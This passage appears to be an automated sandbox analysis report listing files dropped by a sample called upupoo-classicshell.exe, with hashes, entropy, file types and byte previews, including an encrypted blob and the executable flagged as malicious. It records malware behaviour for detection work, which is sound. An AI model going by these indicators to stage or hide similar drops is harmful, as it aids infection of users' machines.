                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.4.9.5.5.9.1.5.6.7.1.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.4.9.5.5.9.6.5.6.7.1.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.6.b.4.d.f.3.-.f.7.6.4.-.4.5.f.8.-.a.a.6.f.-.1.9.5.f.e.c.1.8.3.d.a.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.9.b.b.0.c.a.-.c.a.7.3.-.4.a.8.4.-.9.7.d.c.-.b.6.4.e.6.7.e.3.0.b.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.p.u.p.o.o.-.c.l.a.s.s.i.c.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.u.p.u.p.o.o.-.c.l.a.s.s.i.c.s.h.e.l.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.1.c.-.0.0.0.1.-.0.0.1.4.-.e.9.d.4.-.2.1.d.e.7.2.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.5.8.f.e.4.6.1.e.1.0.c.a.9.0.6.f.5.6.8.4.e.8.d.7.7.4.9.6.5.9.6.0.0.0.0.0.9.0.4.!.0.0.0.0.0.b.b.b.e.b.3.6.0.1.7.5.b.d.6.0.3.3.e.8.

                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E1A.tmp.dmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Oct 7 04:39:10 2024, 0x1205a4 type
                                                                                                            Category:dropped
                                                                                                            Size (bytes):45942
                                                                                                            Entropy (8bit):1.997276000752008
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:pqdVLgJuKoKmSOwdmJXpKrWEjrkJV7s768g/ZZLt1lodxkmBbXk9VyewLO:yV8UKoKmtumJukJByghodxkmBzc8i
                                                                                                            MD5:537A507DC2C85235300BC7DCDAA32B8A
                                                                                                            SHA1:9266E2B512EC1912BFB7001A15A51DF8282A1F0B
                                                                                                            SHA-256:AD5AA50D2113B767861CFC47E282D747FF6B3859E205609062E97A2F875625DA
                                                                                                            SHA-512:60DB2E096E6A285684223AB297F8B6A82DDA95567615E3A32D7FEB6F4E39E42ABE408B4ECC705F1C10AD070E4D8E59BCA4E861F8B0042F64348D7A79D4BA8319
                                                                                                            Malicious:false
                                                                                                            Preview:MDMP..a..... ........e.g........................$...............p"..........T.......8...........T........... ...V.......................................................................................................eJ......D.......GenuineIntel............T.......@....e.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F92.tmp.WERInternalMetadata.xml

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8440
                                                                                                            Entropy (8bit):3.698999821184585
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:R6l7wVeJ6Z6S6Y5vVQ3SU65Igmf3OSprh89b+5sfyKm:R6lXJk6S6Y83SULgmf3u+Sf2
                                                                                                            MD5:89481675AA2281C58ED9361E93457D7D
                                                                                                            SHA1:CBC7CFEF445A5B88CD4F0D41CB254385C61CDBE0
                                                                                                            SHA-256:7F3B5E701FAC7E74E5602FB3D5D66328398A8FD9FE537DD579D663933CDEA065
                                                                                                            SHA-512:293581B0E60E1DF518747218AC58D30FF94725825DC909A3E218977D524C1C69D4D8FAC3688ACCDF187D0E53C8F3FFEE3F84CD65FD5C7228186440B1BF80D1B6
                                                                                                            Malicious:false
                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.9.6.<./.P.i.

                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5FE1.tmp.xml

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4769
                                                                                                            Entropy (8bit):4.484706858911588
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:cvIwWl8zs0Jg77aI97AWpW8VYoYm8M4J6t7JFv+q8vat7vaKcQIcQGgXRd:uIjfyI7157VMJ6xKaRaKkGCRd
                                                                                                            MD5:01B1F3D1833110BBA8FC671E203421BF
                                                                                                            SHA1:2C70E151784405C0CD13FCD9AC6B73A7FBE756DB
                                                                                                            SHA-256:C9DE0AF44119524729EA85FF6DB4EC579A41F79FEA7D81D66303C1223BBB070C
                                                                                                            SHA-512:F6F51A360E9B311E5A0D0A542FF71B7C05FE5EACF3792301836CC45C7CFD17B40B9DEA582D2855A3A488F33D1C2EE0A30867E3AC8C806DC8A79AA69B5D4D7811
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="532541" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F7D.tmp.dmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Oct 7 04:39:19 2024, 0x1205a4 type
                                                                                                            Category:dropped
                                                                                                            Size (bytes):45210
                                                                                                            Entropy (8bit):2.033874872490031
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:YvwLghuSOwdmcsXsmSVLSTPWu1S+3If3bHgPOyOMj6:+w8mupsPSVLkEie3bHgPx
                                                                                                            MD5:263FAE3D174B883793924C6C17C1E366
                                                                                                            SHA1:32BEAAEB7183D2989960C573919A68C54F01EFF1
                                                                                                            SHA-256:21E27735AB89DB3A15C77730DE1E56894CFD0A0F3C372A80D3DCA329FF1018B7
                                                                                                            SHA-512:DF6CFD6995AC17029FC9BFF681B37864C6083FF33CAD21BD97C292C007AED3BC674843A6B451766077E50CFC4EC9C13399D4E391DACF05196B801CE4CB8F1506
                                                                                                            Malicious:false
                                                                                                            Preview:MDMP..a..... ........e.g........................$...............p"..........T.......8...........T.......................................................................................................................eJ......D.......GenuineIntel............T............e.g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER7FFB.tmp.WERInternalMetadata.xml

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8460
                                                                                                            Entropy (8bit):3.699053239742441
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:R6l7wVeJk6626YEI5SU90orgmfROSprY89bGksfrim:R6lXJ5626YEGSU90orgmfRlGXfP
                                                                                                            MD5:F72E321A4248A048274D5CFA4FB82C87
                                                                                                            SHA1:6FCCE2E4A9AB1BF313B1BD2FDFFAA0D0ABB730BC
                                                                                                            SHA-256:ACA4D0CFECA16FEE482715A4D73D38486543A00FE7FE4D55356AAED56D7DDAF2
                                                                                                            SHA-512:FFCA926308C1F5BBC5380B3D35F3A26E6D7B1CAFA812D54DA2236BE02C56E51DDCFCD3E773BBF04F397E60FAB08BE2C98899E64B71E65B560AA51DBF744D79F2
                                                                                                            Malicious:false
                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.0.8.<./.P.i.

                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER8079.tmp.xml

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4843
                                                                                                            Entropy (8bit):4.496322480174013
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:cvIwWl8zs2iJg77aI97AWpW8VYg5Ym8M4JQt7JF5+q8vwt7fBtKiYogXUd:uIjffI7157VoJQnKwRBTfCUd
                                                                                                            MD5:CDECBAAE0708FF5B557D33B07A6DA857
                                                                                                            SHA1:24B76DA17E7181A93F6D16C65731E78CF2C4A330
                                                                                                            SHA-256:579CB10FC6C5EB42C0DF9EEA87E21D5D5A47A2A35FF96F6E6229E115461DA01D
                                                                                                            SHA-512:9A38FBF07EDF81B47EC86A2E1E217136EB02948D28A188F7AB8141DCE509B0A5B9B9C6FF68AEA1757B7731CC0FBA20311327E1E88723A2BB008E84DBA4CFCB51
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="532542" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                            C:\Users\Public\Documents\ClassicStartMenuDLL.dll (copy)

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\upupoo-classicshell.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):243712
                                                                                                            Entropy (8bit):6.85528085491608
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:zKZ/ikgjBxcTw7lIdrnS5355bC6vkuphSFd/hwlJQHmD3aQSYbx7ieLrMvBhQ2xD:k/ikgjYTKH35UkphwJPEKKiKrMJhQ
                                                                                                            MD5:D48560E3661D0EAE2E67CB13044710C3
                                                                                                            SHA1:2D2C3AD41FA699C00FD10285448BC1E0E70D9E63
                                                                                                            SHA-256:F3378B866C81A82E16807EAD2126E59ECEC07F08F9750BC03F13B68B7519A966
                                                                                                            SHA-512:9B8B6ADBF5C1F75BA13B677B29CEE71D6A826985D77E91956104D262703583A3AE2FE6E835917F9EDBBB8EFE9D61F6B902A23D523C8333CA720B7C7138B69F13
                                                                                                            Malicious:false
                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........>.g._b4._b4._b4r.4._b4r.4._b4r.4._b4...4._b4._c4G_b4X..4._b4#.a5._b4#.g5._b4#.f5._b4._b4._b44.a5._b44.f5._b44.g5._b44.b5._b44..4._b44.`5._b4Rich._b4................PE..L......f...........!......................................................................@..........................B..E....F..P...............................$4...0..8...................41.......0..@...............X............................text...)........................... ..`.rdata..j...........................@..@.data...pP...P...>...>..............@....tls.................|..............@....rsrc................~..............@..@.reloc..$4.......6..................@..B........................................................................................................................................................................................................................

                                                                                                            C:\Users\Public\Documents\upup.ox (copy)

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\upupoo-classicshell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):89088
                                                                                                            Entropy (8bit):7.997839675244527
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:Y6YS7k7T3meXF/L84dzPu3beQ09aTQVRpVADU9mMy0H7lsH9:PY4k+ei41Pw4a8VRphmVilsd
                                                                                                            MD5:0528A5A3C232862A4B0D9624B6F23D0C
                                                                                                            SHA1:45ADAD971A0DB2EA9F26A69C881557995B49A5B6
                                                                                                            SHA-256:C42036589B0B746F4A72BD0C900FB07F1C9032AA4842CD4AFC6CFC6ABBA4FB9B
                                                                                                            SHA-512:C084E7657C3498B776845E5B7BE32A976849A963B6C74CE62A7F35DF7E77DF80603881546DCB468D512464CDF71A800CF449BCFA18585B5F87E314007447649E
                                                                                                            Malicious:false
                                                                                                            Preview:.K.uU"...x....d.M.7.|.i_c^^.K]YM(}./........1.{QM<.x.....[.x...5..hiz.k..)p.2..q.=..?s;..'.,f.x.N..h..}....K.I....8.Q9.9X.3.zdj...G.m..B.{.._k@Z.n..dxS.Et......Iea........H.Rm/.5.....R_....GS.2.,.F.N. .....&-..".B.Z..E.G...T.\..........:.m.<f.$............\........nS.{5..Y...-.'C.pN..k..==....Nn4.@.........W...rU..b..o/...6.@ ..@$t....M#&.+5..E.....&.d..<(.....@*......}....1.K......._..-.RGj..K.+....=...N... zLa..o.3.6...ZG.....`A.}.,.lrbA..D#>.%...n.2...A..;.j..F..B\.E...0.......8.........o..,..9X.R....$.G.....S r.-..?..e.`+ZI.@D.e.3p..n..!...Y.,.-?v.c......a.I..|@..6).$9N..(.f..jEFM..A.......Z.B....L1O..K..I..X....7..Q....$%/..o....t.vN....j....21...6.2L...>....9...0..@...Ns......(.N...o(..:.......,..t....o./Z..q.d."..{..XI..~...U.(.'.f.../W....h.....E.G.X-.(:HyL.J./e.n....!d..z...Y..1...k.{Ph..>../.y..2"...):5......b.I2.o.H,q."s.+.+...{wf_.B...2..y....G.Lg.U.5.j....Hm....\.).,H.F..OQ..D0.....L..(8..O.[.'.)....(..eaX<.]...w..E.4.....

                                                                                                            C:\Users\Public\Documents\upupoo-classicshell.exe (copy)

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\upupoo-classicshell.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):198920
                                                                                                            Entropy (8bit):6.459024129905556
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:3ADL8CQJ+ZhpTjqENRRRRRRRRRRRRRRRRRRRRRRRRRRRRKYRRRRRRRRRRRRRRRR6:3ADoC0+Z3VNRRRRRRRRRRRRRRRRRRRRg
                                                                                                            MD5:606CDA46E88CE86AE85AC92B2B560D0A
                                                                                                            SHA1:0BBBEB360175BD6033E8DBB0E1571D4595ED38DD
                                                                                                            SHA-256:99AC89D65B0CFC28D64652717EDF4B66E5DDE4741379EEB2F4F9A187801EA50E
                                                                                                            SHA-512:CBF457D793757676A7C1D5B364AE194D4B8433D9F36E82496B8EE8A92B1498A16A1E25BDB3C86DE6692F2B9E397E5B59ABA0DAA5E2EB90371E20C4D751B5037C
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................g...........<.....................Rich...........................PE..L...`..b.............................X.......0....@.................................P(....@.................................$h...........................A...........3...............................Z..@............0...............................text............................... ..`.rdata...H...0...J... ..............@..@.data...8=....... ...j..............@....rsrc...............................@..@.reloc...#.......$..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4770
                                                                                                            Entropy (8bit):7.946747821604857
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                            MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                            SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                            SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                            SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                            Malicious:false
                                                                                                            Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                            Category:dropped
                                                                                                            Size (bytes):71954
                                                                                                            Entropy (8bit):7.996617769952133
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                            Malicious:false
                                                                                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):471
                                                                                                            Entropy (8bit):7.249252281958118
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:JuGm5qPGybBcPEK0I0vbK8ppq+soOa3Hm2Hjz8:J0INbBI0vbKf+0AHw
                                                                                                            MD5:D426FFF7C46A8A72E6DA87ED32BD448C
                                                                                                            SHA1:02B692054DBABCD5D460F02BBC212A55B1C526CD
                                                                                                            SHA-256:2FD69E98D4C9C6D20D042C4ABC35B3CB5220EFF1557906F303C8D3524F625D47
                                                                                                            SHA-512:AD61316B7A9EBA1E597B2DAC598FB9118F966049BDECFC8B637C8F8508A40D308E726444484A5EFDEFA80029453A9A538ABCD2BF8C0756F1EEF93CE76B216DF8
                                                                                                            Malicious:false
                                                                                                            Preview:0..........0.....+.....0......0...0......N"T ....n..........9..20241005213119Z0s0q0I0...+........9.q...._..(.#..Y\C...N"T ....n..........9....n.U_$t...]......20241005213119Z....20241012213119Z0...*.H.............z_8 ..h..N..c.V....hV#..H..@agG......j.....j..Y{.MX.b...QO..{k#.)'.C .k.`.I.PG..u..,.$.....W\.hSz..$-....2a..Xx..^Y...*.._...7.M.. .p...~..L".Fe........l..iR..Wdh...<..V..3.P........wd..3.7..u..A.6....g..k~.....h..R...e.s.......V.o.}b.T>;Td

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):471
                                                                                                            Entropy (8bit):7.19118940646143
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:J0MwG+Gt5o7D82TwrUGu0y9pHacEn5DZC2UsORW0i2LCH+qCRWKoZKFm0PZBuPYA:JuGt5qPGu0XtHUTRVirHLC/GkPZcKwT
                                                                                                            MD5:0B3EF333037FF85E1AAA7DA10AE81A4A
                                                                                                            SHA1:A305AE70C4D05C7E4BEF562F62B5C628D0EA8235
                                                                                                            SHA-256:145026441B625675655D2DEEE872E7D1F90FDEC6FFD8213FEB31CEC0584B9DA8
                                                                                                            SHA-512:9E157F3AD6B15D0F802DC1A12369F40541DC1E31DB47C62F1AE48276752C265845EB7A3620960AE927B4027A91DF80DAD87188C4F0862A246F2734C7E9DF89C5
                                                                                                            Malicious:false
                                                                                                            Preview:0..........0.....+.....0......0...0......N"T ....n..........9..20241005213024Z0s0q0I0...+........9.q...._..(.#..Y\C...N"T ....n..........9....e&D.^=.8t.]......20241005213024Z....20241012213024Z0...*.H..................+.'@.+.....v.....E.xF..l...<.E.....^q....+...t.I@.,....L.T..P.s~.....QzLOr./..{.]`.....,...}7u.]...LJw.. .>..\e..An.?....4.V9E...,J.T..S..m>L.......H.i.i...}.h..*.....M_..y;5P1.i~.5.N9..YB.....8j..k.y..-.@o}.x.5[.J.......9.0...$.."e.. E\

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):471
                                                                                                            Entropy (8bit):7.2010190011112485
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:JuG8X5qPGJp5rEUJT/HcnumfB0zFYscdvSz2cvW/:JQIABJb8numCOZ9cdW/
                                                                                                            MD5:E6D09866D0926E2D73584454EDD80B76
                                                                                                            SHA1:98AF8B88E778A49265C50B9F7A111D94B3A6BA01
                                                                                                            SHA-256:204090FA7917C0FA2D492DDA361855C04A98E210E6401EB8AF346D18F9348488
                                                                                                            SHA-512:A1CBA8630A60FEF9C9C4FA16CA24CB960F5A9FDDEDF636DF7B467CD1421D44D4E03B68D0D7229F5DEB6672BA6D448CD07FD9EBC6DFCC2F9C7E66D31AB9CED565
                                                                                                            Malicious:false
